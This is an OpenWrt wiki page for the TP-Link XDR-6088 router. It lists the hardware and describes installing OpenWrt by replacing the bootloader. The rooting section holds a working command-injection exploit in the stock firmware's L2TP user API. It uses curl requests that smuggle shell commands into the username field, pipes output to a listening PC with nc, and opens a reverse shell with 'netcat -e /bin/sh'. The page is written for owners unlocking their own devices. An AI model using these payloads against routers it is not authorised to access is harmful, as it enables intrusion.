TP-Link XDR-6088

The TP-Link XDR-6088 router supports 4 802.11ax streams on both 2.4GHz @40MHz and 5GHz @160MHz for a combined 6000Mbps wireless speed. It is based on the MediaTek MT7986A SoC.

36234d0fed1d89f1b853755c3506970c41e06565.jpeg

Hardware highlights

CPU Ram Flash Network WLAN 2.4G. WLAN 5G USB Serial JTag
MT7986A @ 2.0 GHz 512 MiB 128 MiB 4x 1G, 2x 2.5G b/g/n/ax a/n/ac/ax 1x 3.0 Yes ?

Recent activity

Installation

Because TP-Link has restricted the bootloader significantly, a bootloader replacement is necessary to to get OpenWrt running on the device. This preserves the OEM ART calibration data partition and factory_boot partition that contains the device's MAC address.

The installation procedure is the same as for TP-Link XDR-6086, see also Forum Thread https://forum.openwrt.org/t/adding-support-for-tp-link-xdr-6086

Rooting

Thanks to a root exploit from @JamesLucas, this has been made possible without opening the device.

Optional Requirements:

  • Having a FAT32-formatted USB stick is highly encouraged to install netcat as the BusyBox version is very limited. This guide uses a USB stick to accomplish rooting the device and getting a somewhat-interactive shell.

To root the device, log into the router's web GUI and open your inspector/page editor. You'll find your authentication token stok in the request URL. It'll look something like stok=<your token>/ds.

Next, navigate to the VPN tab and create an L2TP server. Disable encryption to make setup quicker. Settings do not matter as long as they are valid to create a dummy server.

On your PC, curl can be used to speed up the process. The skeleton command looks like this:

curl -H "Content-Type: application/json" -X POST -d '{"vpn":{"table":"user","para":{"username":";<command>","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds

The command parameter should be replaced with whichever shell command you wish to run, and the stok variable should be replaced with the value retrieved using your web inspector/editor.

On your FAT32 formatted USB stick, download netcat and plug it in. If this is your first time plugging it in, then it will be at /dev/sda1 and will increment for each time it is unplugged and replugged until rebooted.

NOTE: Each time we run one of the following commands, a new user on the L2TP server will be created. The shell injection is triggered when the user is disabled. To create a new command, the previous L2TP user should be deleted. This could probably be done with a curl command too, feel free to update.

NOTE: For some commands, a netcat listener could be used to verify if the step was successful. nc -nlvp 4444

Mounting the USB Stick

Create mount point:

curl -H "Content-Type: application/json" -X POST -d '{"vpn":{"table":"user","para":{"username":";mkdir /tmp/usb &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds

Disable the L2TP user via the web GUI to trigger.

Delete L2TP user from server via web GUI.

Check the mount point (using netcat listener on port 4444, check your IP);

curl -H "Content-Type: application/json" -X POST -d '{"vpn":{"table":"user","para":{"username":";ls -la /tmp | nc 192.168.1.100 4444 &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds

If successful, you should see a directory usb has been created.

Disable the L2TP user via the web GUI to trigger.

Delete L2TP user from server via web GUI.

Mount the USB stick:

curl -H "Content-Type: application/json" -X POST -d '{"vpn":{"table":"user","para":{"username":";mount -t vfat /dev/sda1 /tmp/usb &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds

Disable the L2TP user via the web GUI to trigger.

Delete L2TP user from server via web GUI.

Check if it mounted; you'll see the netcat .ipk if it worked:

curl -H "Content-Type: application/json" -X POST -d '{"vpn":{"table":"user","para":{"username":";ls -la /tmp/usb | nc 192.168.1.100 4444 &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds

Disable the L2TP user via the web GUI to trigger.

Delete L2TP user from server via web GUI.

Install netcat

Install netcat (be sure to check the name of your ipk matches):

curl -H "Content-Type: application/json" -X POST -d '{"vpn":{"table":"user","para":{"username":";opkg install /tmp/usb/netcat.ipk &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds

Disable the L2TP user via the web GUI to trigger.

Delete L2TP user from server via web GUI.

Get a root shell

Now, let's get a root shell (you need your netcat listener on your PC for this):

curl -H "Content-Type: application/json" -X POST -d '{"vpn":{"table":"user","para":{"username":";netcat -e /bin/sh 192.168.1.100 4444 &","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds

Disable the L2TP user via the web GUI to trigger.

Flashing OpenWrt

1. Execute the above mentioned operations to open nc shell.

2. Replace the stock bootloader to OpenWrt's

dd bs=131072 conv=sync of=/dev/mtdblock9 if=/tmp/openwrt-mediatek-filogic-tplink_tl-xdr6088-preloader.bin

dd bs=131072 conv=sync of=/dev/mtdblock9 seek=28 if=/tmp/openwrt-mediatek-filogic-tplink_tl-xdr6088-bl31-uboot.fip

3. Connect to your PC via the Gigabit port of the router, set a static ip on the ethernet interface of your PC, e.g. ip 192.168.1.254, gateway 192.168.1.1.

4. Download the initramfs image, and restart the router, waiting for tftp recovery to complete.

5. After openwrt boots up, perform sysupgrade.

Hardware

Info

Architecture ARM
Vendor MediaTek
Bootloader TF-A + U-Boot
System-On-Chip MT7986
CPU/Speed 2.0 GHz
Flash-Chip ?
Flash size 128 MiB
RAM 512 MiB
Wireless MT7986GN 2.4GHz 802.11bgnax
Ethernet 10/100/1000/2500 Mbit/s w/ vlan support
Switch MediaTek MT7531A
USB 1x 3.0
Serial Yes
JTAG Unknown

Photos

See complete tear down (in chinese) https://www.acwifi.net/20864.html

Tags

How to add tags

, , , , , , , , , , , , ,
This website uses cookies. By using the website, you agree with storing cookies on your computer. Also you acknowledge that you have read and understand our Privacy Policy. If you do not agree leave the website.More information about cookies
  • Last modified: 2025/02/21 09:47
  • by humaita